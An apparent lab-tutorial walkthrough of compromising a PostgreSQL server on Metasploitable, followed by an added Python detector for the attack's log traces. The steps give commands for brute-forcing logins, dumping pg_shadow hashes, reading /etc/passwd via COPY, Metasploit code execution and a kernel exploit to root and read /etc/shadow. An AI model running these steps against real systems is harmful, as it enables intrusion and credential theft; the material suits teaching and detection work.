Among the many Object-Relational DBMS (ORDBMS) out there, one of the most popular ones is PostgreSQL. PostgreSQL, often referred to as Postgres, is an open-source Object-Relational DBMS supporting almost all SQL constructs. In this episode, Gianni explains how to attack a PostgreSQL database, read and write files via SQL, use weak permissions to get code execution on the target machine, and get root by exploiting a Linux kernel vulnerability.

Tools, Scripts, and Exploits

Steps

  1. Identify the listening services on the target machine
    • nmap -v -sV 192.168.75.149 -p-
  2. Brute-force the Postgres instance
    • msfconsole
    • use auxiliary/scanner/postgres/postgres_login
    • set RHOST 192.168.75.149
    • run
  3. Connect to the database and gather information
    • psql -h 192.168.75.149 -U postgres -W   # password = postgres
    • SELECT VERSION();
    • SELECT usename, passwd FROM pg_shadow;
    • Test if you can read files from the system
      • CREATE TABLE myfile (input TEXT);
      • COPY myfile FROM '/etc/passwd';
      • SELECT input FROM myfile;
    • Test if you can write files in /tmp
      • CREATE TABLE testfile (output TEXT);
      • INSERT INTO testfile(output) VALUES ('test');
      • COPY testfile(output) TO '/tmp/testfile';
      • Go to Metasploitable and check if the file was created successfully
        • login with msfadmin/msfadmin
        • ls /tmp
        • cat /tmp/testfile
  4. Use Metasploit’s postgres_payload module to get code execution
    • msfconsole
    • use exploit/linux/postgres/postgres_payload
    • show options
    • set RHOST 192.168.75.149
    • exploit
    • sysinfo
  5. Escalate to root
    • background
    • use exploit/linux/local/udev_netlink
    • show options
    • set SESSION 1
    • exploit
    • uuid
    • shell
    • whoami
    • cat /etc/shadow
  6. Game over!
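
Seen from the database server, steps 2 and 3 above leave traces in the PostgreSQL log: repeated failed logins, a query against pg_shadow, and COPY statements that name a server-side file. The detector below is an added example, not part of the original episode notes. It assumes log_line_prefix = '%t %h %u ' and log_statement = 'all'; the log lines and the 192.0.2.x addresses are constructed.

```python
import re
from collections import Counter

# Constructed sample log. Assumes log_line_prefix = '%t %h %u ' and log_statement = 'all'.
SAMPLE_LOG = '''\
2024-01-01 10:00:01 UTC 192.0.2.10 postgres FATAL:  password authentication failed for user "postgres"
2024-01-01 10:00:01 UTC 192.0.2.10 postgres FATAL:  password authentication failed for user "postgres"
2024-01-01 10:00:02 UTC 192.0.2.10 postgres FATAL:  password authentication failed for user "postgres"
2024-01-01 10:00:09 UTC 192.0.2.20 app FATAL:  password authentication failed for user "app"
2024-01-01 10:01:00 UTC 192.0.2.10 postgres LOG:  statement: SELECT usename, passwd FROM pg_shadow;
2024-01-01 10:01:30 UTC 192.0.2.10 postgres LOG:  statement: COPY myfile FROM '/etc/passwd';
2024-01-01 10:02:00 UTC 192.0.2.20 app LOG:  statement: COPY orders FROM STDIN;
2024-01-01 10:02:30 UTC 192.0.2.10 postgres LOG:  statement: COPY testfile(output) TO '/tmp/testfile';
'''

# timestamp (date, time, zone), client host, user, severity, message
LINE = re.compile(r'^\S+ \S+ \S+ (?P<host>\S+) (?P<user>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$')
AUTH_FAIL = re.compile(r'password authentication failed for user "([^"]+)"')
# Server-side COPY names a quoted path; client-side COPY uses STDIN/STDOUT and is ignored.
COPY_FILE = re.compile(r"statement:.*\bCOPY\b.+?\b(FROM|TO)\s+'([^']+)'", re.I)
PG_SHADOW = re.compile(r"statement:.*\bpg_shadow\b", re.I)

def analyze(log_text, fail_threshold=3):
    """Return (finding, client_host, detail) tuples in log order."""
    findings, fails = [], Counter()
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # continuation lines or a different prefix
        host, msg = m["host"], m["msg"]
        if AUTH_FAIL.search(msg):
            fails[host] += 1
            if fails[host] == fail_threshold:  # report once per host
                findings.append(("bruteforce", host, f"{fail_threshold} failed logins"))
        elif (c := COPY_FILE.search(msg)):
            kind = "file_read" if c.group(1).upper() == "FROM" else "file_write"
            findings.append((kind, host, c.group(2)))
        elif PG_SHADOW.search(msg):
            findings.append(("hash_dump", host, "pg_shadow queried"))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding, sep="\t")
```

With log_statement set to 'mod' instead of 'all', PostgreSQL logs COPY FROM but not COPY TO or the SELECT on pg_shadow, so only part of this activity would be visible.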
